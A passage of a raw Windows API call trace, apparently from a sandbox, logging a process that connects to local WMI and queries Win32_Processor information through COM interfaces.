puBuffLength=0x18a0dc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0232.393] CoCreateInstance (in: rclsid=0x73cf1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x73cf12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x189fb8 | out: ppv=0x189fb8*=0x5b2d240) returned 0x0 [0232.394] WbemLocator:IWbemLocator:ConnectServer (in: This=0x5b2d240, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x18a04c | out: ppNamespace=0x18a04c*=0x5b3323c) returned 0x0 [0232.403] WbemLocator:IUnknown:QueryInterface (in: This=0x5b3323c, riid=0x73cf1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189ee8 | out: ppvObject=0x189ee8*=0x7a14fc) returned 0x0 [0232.403] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x7a14fc, pProxy=0x5b3323c, pAuthnSvc=0x189f38, pAuthzSvc=0x189f34, pServerPrincName=0x189f2c, pAuthnLevel=0x189f30, pImpLevel=0x189f20, pAuthInfo=0x189f24, pCapabilites=0x189f28 | out: pAuthnSvc=0x189f38*=0xa, pAuthzSvc=0x189f34*=0x0, pServerPrincName=0x189f2c, pAuthnLevel=0x189f30*=0x6, pImpLevel=0x189f20*=0x2, pAuthInfo=0x189f24, pCapabilites=0x189f28*=0x1) returned 0x0 [0232.403] WbemLocator:IUnknown:Release (This=0x7a14fc) returned 0x1 [0232.403] WbemLocator:IUnknown:QueryInterface (in: This=0x5b3323c, riid=0x73cf10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189edc | out: ppvObject=0x189edc*=0x7a151c) returned 0x0 [0232.403] WbemLocator:IUnknown:QueryInterface (in: This=0x5b3323c, riid=0x73cf1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189ed8 | out: ppvObject=0x189ed8*=0x7a14fc) returned 0x0 [0232.403] WbemLocator:IClientSecurity:SetBlanket (This=0x7a14fc, pProxy=0x5b3323c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0232.404] WbemLocator:IUnknown:Release (This=0x7a14fc) returned 0x2 [0232.404] WbemLocator:IUnknown:Release (This=0x7a151c) returned 0x1 [0232.404] CoTaskMemFree (pv=0x7b57a8) [0232.404] WbemLocator:IUnknown:Release (This=0x5b2d240) returned 0x0 [0232.404] WbemLocator:IUnknown:QueryInterface (in: This=0x5b3323c, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189ad8 | out: ppvObject=0x189ad8*=0x7a151c) returned 0x0 [0232.404] WbemLocator:IUnknown:QueryInterface (in: This=0x7a151c, riid=0x749afc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x189a94 | out: ppvObject=0x189a94*=0x0) returned 0x80004002 [0232.404] WbemLocator:IUnknown:QueryInterface (in: This=0x7a151c, riid=0x749afe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1898b4 | out: ppvObject=0x1898b4*=0x0) returned 0x80004002 [0232.405] WbemLocator:IUnknown:AddRef (This=0x7a151c) returned 0x3 [0232.405] WbemLocator:IUnknown:QueryInterface (in: This=0x7a151c, riid=0x749af90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x1893f4 | out: ppvObject=0x1893f4*=0x0) returned 0x80004002 [0232.405] WbemLocator:IUnknown:QueryInterface (in: This=0x7a151c, riid=0x749af860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x1893a4 | out: ppvObject=0x1893a4*=0x0) returned 0x80004002 [0232.405] WbemLocator:IUnknown:QueryInterface (in: This=0x7a151c, riid=0x7499c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1893b0 | out: ppvObject=0x1893b0*=0x7a147c) returned 0x0 [0232.405] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7a147c, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1893b8 | out: pCid=0x1893b8*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0232.405] WbemLocator:IUnknown:Release (This=0x7a147c) returned 0x3 [0232.405] CoGetContextToken (in: pToken=0x189410 | out: pToken=0x189410) returned 0x0 [0232.405] CoGetContextToken (in: pToken=0x189818 | out: pToken=0x189818) returned 0x0 [0232.405] WbemLocator:IUnknown:QueryInterface (in: This=0x7a151c, riid=0x749afb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1898a8 | out: ppvObject=0x1898a8*=0x7a1504) returned 0x0 [0232.406] WbemLocator:IRpcOptions:Query (in: This=0x7a1504, pPrx=0x7a151c, dwProperty=2, pdwValue=0x1898d0 | out: pdwValue=0x1898d0) returned 0x80004002 [0232.406] WbemLocator:IUnknown:Release (This=0x7a1504) returned 0x3 [0232.406] WbemLocator:IUnknown:Release (This=0x7a151c) returned 0x2 [0232.406] CoGetContextToken (in: pToken=0x189de8 | out: pToken=0x189de8) returned 0x0 [0232.406] CoGetContextToken (in: pToken=0x189d48 | out: pToken=0x189d48) returned 0x0 [0232.406] WbemLocator:IUnknown:QueryInterface (in: This=0x7a151c, riid=0x189e18*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x189e14 | out: ppvObject=0x189e14*=0x5b3323c) returned 0x0 [0232.406] WbemLocator:IUnknown:AddRef (This=0x5b3323c) returned 0x4 [0232.406] WbemLocator:IUnknown:Release (This=0x5b3323c) returned 0x3 [0232.406] WbemLocator:IUnknown:Release (This=0x5b3323c) returned 0x2 [0232.406] SysStringLen (param_1=0x0) returned 0x0 [0232.406] CoGetContextToken (in: pToken=0x189de0 | out: pToken=0x189de0) returned 0x0 [0232.406] WbemLocator:IUnknown:AddRef (This=0x7a151c) returned 0x3 [0232.406] WbemLocator:IUnknown:QueryInterface (in: This=0x7a151c, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189c74 | out: ppvObject=0x189c74*=0x7a151c) returned 0x0 [0232.406] WbemLocator:IUnknown:Release (This=0x7a151c) returned 0x3 [0232.406] WbemLocator:IUnknown:Release (This=0x7a151c) returned 0x2 [0232.406] CoGetContextToken (in: pToken=0x189ed8 | out: pToken=0x189ed8) returned 0x0 [0232.406] WbemLocator:IUnknown:AddRef (This=0x5b3323c) returned 0x3 [0232.406] IWbemServices:ExecQuery (in: This=0x5b3323c, strQueryLanguage="WQL", strQuery="SELECT * FROM WIN32_PROCESSOR", lFlags=16, pCtx=0x0, ppEnum=0x18a0e8 | out: ppEnum=0x18a0e8*=0x5b332dc) returned 0x0 [0232.421] IUnknown:QueryInterface (in: This=0x5b332dc, riid=0x73cf1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189f4c | out: ppvObject=0x189f4c*=0x5b332e0) returned 0x0 [0232.421] IClientSecurity:QueryBlanket (in: This=0x5b332e0, pProxy=0x5b332dc, pAuthnSvc=0x189f9c, pAuthzSvc=0x189f98, pServerPrincName=0x189f90, pAuthnLevel=0x189f94, pImpLevel=0x189f84, pAuthInfo=0x189f88, pCapabilites=0x189f8c | out: pAuthnSvc=0x189f9c*=0xa, pAuthzSvc=0x189f98*=0x0, pServerPrincName=0x189f90, pAuthnLevel=0x189f94*=0x6, pImpLevel=0x189f84*=0x2, pAuthInfo=0x189f88, pCapabilites=0x189f8c*=0x1) returned 0x0 [0232.421] IUnknown:Release (This=0x5b332e0) returned 0x1 [0232.421] IUnknown:QueryInterface (in: This=0x5b332dc, riid=0x73cf10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189f40 | out: ppvObject=0x189f40*=0x7a142c) returned 0x0 [0232.421] IUnknown:QueryInterface (in: This=0x5b332dc, riid=0x73cf1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189f3c | out: ppvObject=0x189f3c*=0x5b332e0) returned 0x0 [0232.421] IClientSecurity:SetBlanket (This=0x5b332e0, pProxy=0x5b332dc, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0232.431] IUnknown:Release (This=0x5b332e0) returned 0x2 [0232.431] WbemLocator:IUnknown:Release (This=0x7a142c) returned 0x1 [0232.431] CoTaskMemFree (pv=0x7b5748) [0232.431] IUnknown:QueryInterface (in: This=0x5b332dc, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189b38 | out: ppvObject=0x189b38*=0x7a142c) returned 0x0 [0232.432] WbemLocator:IUnknown:QueryInterface (in: This=0x7a142c, riid=0x749afc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x189af4 | out: ppvObject=0x189af4*=0x0) returned 0x80004002 [0232.432] WbemLocator:IUnknown:QueryInterface (in: This=0x7a142c, riid=0x749afe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x189914 | out: ppvObject=0x189914*=0x0) returned 0x80004002 [0232.434] WbemLocator:IUnknown:AddRef (This=0x7a142c) returned 0x3 [0232.434] WbemLocator:IUnknown:QueryInterface (in: This=0x7a142c, riid=0x749af90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x189454 | out: ppvObject=0x189454*=0x0) returned 0x80004002 [0232.436] WbemLocator:IUnknown:QueryInterface (in: This=0x7a142c, riid=0x749af860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x189404 | out: ppvObject=0x189404*=0x0) returned 0x80004002 [0232.438] WbemLocator:IUnknown:QueryInterface (in: This=0x7a142c, riid=0x7499c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189410 | out: ppvObject=0x189410*=0x7a138c) returned 0x0 [0232.438] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7a138c, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x189418 | out: pCid=0x189418*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0232.438] WbemLocator:IUnknown:Release (This=0x7a138c) returned 0x3 [0232.438] CoGetContextToken (in: pToken=0x189470 | out: pToken=0x189470) returned 0x0 [0232.438] CoGetContextToken (in: pToken=0x189878 | out: pToken=0x189878) returned 0x0 [0232.438] WbemLocator:IUnknown:QueryInterface (in: This=0x7a142c, riid=0x749afb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189908 | out: ppvObject=0x189908*=0x7a1414) returned 0x0 [0232.438] WbemLocator:IRpcOptions:Query (in: This=0x7a1414, pPrx=0x7a142c, dwProperty=2, pdwValue=0x189930 | out: pdwValue=0x189930) returned 0x80004002 [0232.438] WbemLocator:IUnknown:Release (This=0x7a1414) returned 0x3 [0232.438] WbemLocator:IUnknown:Release (This=0x7a142c) returned 0x2 [0232.438] CoGetContextToken (in: pToken=0x189e48 | out: pToken=0x189e48) returned 0x0 [0232.438] CoGetContextToken (in: pToken=0x189da8 | out: pToken=0x189da8) returned 0x0 [0232.438] WbemLocator:IUnknown:QueryInterface (in: This=0x7a142c, riid=0x189e78*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x189e74 | out: ppvObject=0x189e74*=0x5b332dc) returned 0x0 [0232.438] IUnknown:AddRef (This=0x5b332dc) returned 0x4 [0232.438] IUnknown:Release (This=0x5b332dc) returned 0x3 [0232.438] IUnknown:Release (This=0x5b332dc) returned 0x2 [0232.438] WbemLocator:IUnknown:Release (This=0x5b3323c) returned 0x2 [0232.438] SysStringLen (param_1=0x0) returned 0x0 [0232.438] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5b20820, puCount=0x18a134 | out: puCount=0x18a134*=0x2) returned 0x0 [0232.438] WbemDefPath:IWbemPath:GetText (in: This=0x5b20820, lFlags=4, puBuffLength=0x18a130*=0x0, pszText=0x0 | out: puBuffLength=0x18a130*=0xf, pszText=0x0) returned 0x0 [0232.439] WbemDefPath:IWbemPath:GetText (in: This=0x5b20820, lFlags=4, puBuffLength=0x18a130*=0xf, pszText="00000000000000" | out: puBuffLength=0x18a130*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0232.439] CoGetContextToken (in: pToken=0x189f88 | out: pToken=0x189f88) returned 0x0 [0232.439] IUnknown:AddRef (This=0x5b332dc) returned 0x3 [0232.439] IEnumWbemClassObject:Clone (in: This=0x5b332dc, ppEnum=0x18a144 | out: ppEnum=0x18a144*=0x5b333a4) returned 0x0 [0232.446] IUnknown:QueryInterface (in: This=0x5b333a4, riid=0x73cf1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18a008 | out: ppvObject=0x18a008*=0x5b333a8) returned 0x0 [0232.446] IClientSecurity:QueryBlanket (in: This=0x5b333a8, pProxy=0x5b333a4, pAuthnSvc=0x18a058, pAuthzSvc=0x18a054, pServerPrincName=0x18a04c, pAuthnLevel=0x18a050, pImpLevel=0x18a040, pAuthInfo=0x18a044, pCapabilites=0x18a048 | out: pAuthnSvc=0x18a058*=0xa, pAuthzSvc=0x18a054*=0x0, pServerPrincName=0x18a04c, pAuthnLevel=0x18a050*=0x6, pImpLevel=0x18a040*=0x2, pAuthInfo=0x18a044, pCapabilites=0x18a048*=0x1) returned 0x0 [0232.446] IUnknown:Release (This=0x5b333a8) returned 0x1 [0232.446] IUnknown:QueryInterface (in: This=0x5b333a4, riid=0x73cf10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189ffc | out: ppvObject=0x189ffc*=0x7a16fc) returned 0x0 [0232.446] IUnknown:QueryInterface (in: This=0x5b333a4, riid=0x73cf1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189ff8 | out: ppvObject=0x189ff8*=0x5b333a8) returned 0x0 [0232.446] IClientSecurity:SetBlanket (This=0x5b333a8, pProxy=0x5b333a4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0232.451] IUnknown:Release (This=0x5b333a8) returned 0x2 [0232.451] WbemLocator:IUnknown:Release (This=0x7a16fc) returned 0x1 [0232.451] CoTaskMemFree (pv=0x7b57a8) [0232.451] IUnknown:QueryInterface (in: This=0x5b333a4, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189be4 | out: ppvObject=0x189be4*=0x7a16fc) returned 0x0 [0232.451] WbemLocator:IUnknown:QueryInterface (in: This=0x7a16fc, riid=0x749afc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x189ba0 | out: ppvObject=0x189ba0*=0x0) returned 0x80004002 [0232.453] WbemLocator:IUnknown:QueryInterface (in: This=0x7a16fc, riid=0x749afe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1899bc | out: ppvObject=0x1899bc*=0x0) returned 0x80004002 [0232.456] WbemLocator:IUnknown:AddRef (This=0x7a16fc) returned 0x3 [0232.456] WbemLocator:IUnknown:QueryInterface (in: This=0x7a16fc, riid=0x749af90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x1894fc | out: ppvObject=0x1894fc*=0x0) returned 0x80004002 [0232.469] WbemLocator:IUnknown:QueryInterface (in: This=0x7a16fc, riid=0x749af860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x1894ac | out: ppvObject=0x1894ac*=0x0) returned 0x80004002 [0232.483] WbemLocator:IUnknown:QueryInterface (in: This=0x7a16fc, riid=0x7499c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1894b8 | out: ppvObject=0x1894b8*=0x7a165c) returned 0x0 [0232.483] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7a165c, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1894c0 | out: pCid=0x1894c0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0232.483] WbemLocator:IUnknown:Release (This=0x7a165c) returned 0x3 [0232.483] CoGetContextToken (in: pToken=0x189518 | out: pToken=0x189518) returned 0x0 [0232.483] CoGetContextToken (in: pToken=0x189920 | out: pToken=0x189920) returned 0x0 [0232.483] WbemLocator:IUnknown:QueryInterface (in: This=0x7a16fc, riid=0x749afb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1899b0 | out: ppvObject=0x1899b0*=0x7a16e4) returned 0x0 [0232.483] WbemLocator:IRpcOptions:Query (in: This=0x7a16e4, pPrx=0x7a16fc, dwProperty=2, pdwValue=0x1899d8 | out: pdwValue=0x1899d8) returned 0x80004002 [0232.483] WbemLocator:IUnknown:Release (This=0x7a16e4) returned 0x3 [0232.484] WbemLocator:IUnknown:Release (This=0x7a16fc) returned 0x2 [0232.484] CoGetContextToken (in: pToken=0x189ef8 | out: pToken=0x189ef8) returned 0x0 [0232.484] CoGetContextToken (in: pToken=0x189e58 | out: pToken=0x189e58) returned 0x0 [0232.484] WbemLocator:IUnknown:QueryInterface (in: This=0x7a16fc, riid=0x189f28*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x189f24 | out: ppvObject=0x189f24*=0x5b333a4) returned 0x0 [0232.484] IUnknown:AddRef (This=0x5b333a4) returned 0x4 [0232.484] IUnknown:Release (This=0x5b333a4) returned 0x3 [0232.484] IUnknown:Release (This=0x5b333a4) returned 0x2 [0232.484] IUnknown:Release (This=0x5b332dc) returned 0x2 [0232.484] SysStringLen (param_1=0x0) returned 0x0 [0232.484] IEnumWbemClassObject:Reset (This=0x5b333a4) returned 0x0 [0232.498] CoTaskMemAlloc (cb=0x4) returned 0x7e1eb0 [0232.498] IEnumWbemClassObject:Next (in: This=0x5b333a4, lTimeout=-1, uCount=0x1, apObjects=0x7e1eb0, puReturned=0x27a28e4 | out: apObjects=0x7e1eb0*=0x5b333e0, puReturned=0x27a28e4*=0x1) returned 0x0 [0234.113] IUnknown:QueryInterface (in: This=0x5b333e0, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1897a0 | out: ppvObject=0x1897a0*=0x5b333e0) returned 0x0 [0234.113] IUnknown:QueryInterface (in: This=0x5b333e0, riid=0x749afc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x18975c | out: ppvObject=0x18975c*=0x0) returned 0x80004002 [0234.113] IUnknown:QueryInterface (in: This=0x5b333e0, riid=0x749afe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x18957c | out: ppvObject=0x18957c*=0x0) returned 0x80004002 [0234.113] IUnknown:AddRef (This=0x5b333e0) returned 0x3 [0234.113] IUnknown:QueryInterface (in: This=0x5b333e0, riid=0x749af90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x1890bc | out: ppvObject=0x1890bc*=0x0) returned 0x80004002 [0234.113] IUnknown:QueryInterface (in: This=0x5b333e0, riid=0x749af860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x18906c | out: ppvObject=0x18906c*=0x0) returned 0x80004002 [0234.113] IUnknown:QueryInterface (in: This=0x5b333e0, riid=0x7499c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189078 | out: ppvObject=0x189078*=0x5b333e4) returned 0x0 [0234.113] IMarshal:GetUnmarshalClass (in: This=0x5b333e4, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x189080 | out: pCid=0x189080*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0234.113] IUnknown:Release (This=0x5b333e4) returned 0x3 [0234.113] CoGetContextToken (in: pToken=0x1890d8 | out: pToken=0x1890d8) returned 0x0 [0234.114] CoGetContextToken (in: pToken=0x1894e0 | out: pToken=0x1894e0) returned 0x0 [0234.114] IUnknown:QueryInterface (in: This=0x5b333e0, riid=0x749afb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189570 | out: ppvObject=0x189570*=0x0) returned 0x80004002 [0234.114] IUnknown:Release (This=0x5b333e0) returned 0x2 [0234.114] CoGetContextToken (in: pToken=0x189ab0 | out: pToken=0x189ab0) returned 0x0 [0234.114] CoGetContextToken (in: pToken=0x189a10 | out: pToken=0x189a10) returned 0x0 [0234.114] IUnknown:QueryInterface (in: This=0x5b333e0, riid=0x189ae0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x189adc | out: ppvObject=0x189adc*=0x5b333e0) returned 0x0 [0234.114] IUnknown:AddRef (This=0x5b333e0) returned 0x4 [0234.114] IUnknown:Release (This=0x5b333e0) returned 0x3 [0234.114] IUnknown:Release (This=0x5b333e0) returned 0x2 [0234.114] CoTaskMemFree (pv=0x7e1eb0) [0234.114] CoGetContextToken (in: pToken=0x189e20 | out: pToken=0x189e20) returned 0x0 [0234.114] IUnknown:AddRef (This=0x5b333e0) returned 0x3 [0234.114] IWbemClassObject:Get (in: This=0x5b333e0, wszName="__GENUS", lFlags=0, pVal=0x18a130*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x18a1b0*=0, plFlavor=0x18a1ac*=0 | out: pVal=0x18a130*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x18a1b0*=3, plFlavor=0x18a1ac*=64) returned 0x0 [0234.114] IWbemClassObject:Get (in: This=0x5b333e0, wszName="__PATH", lFlags=0, 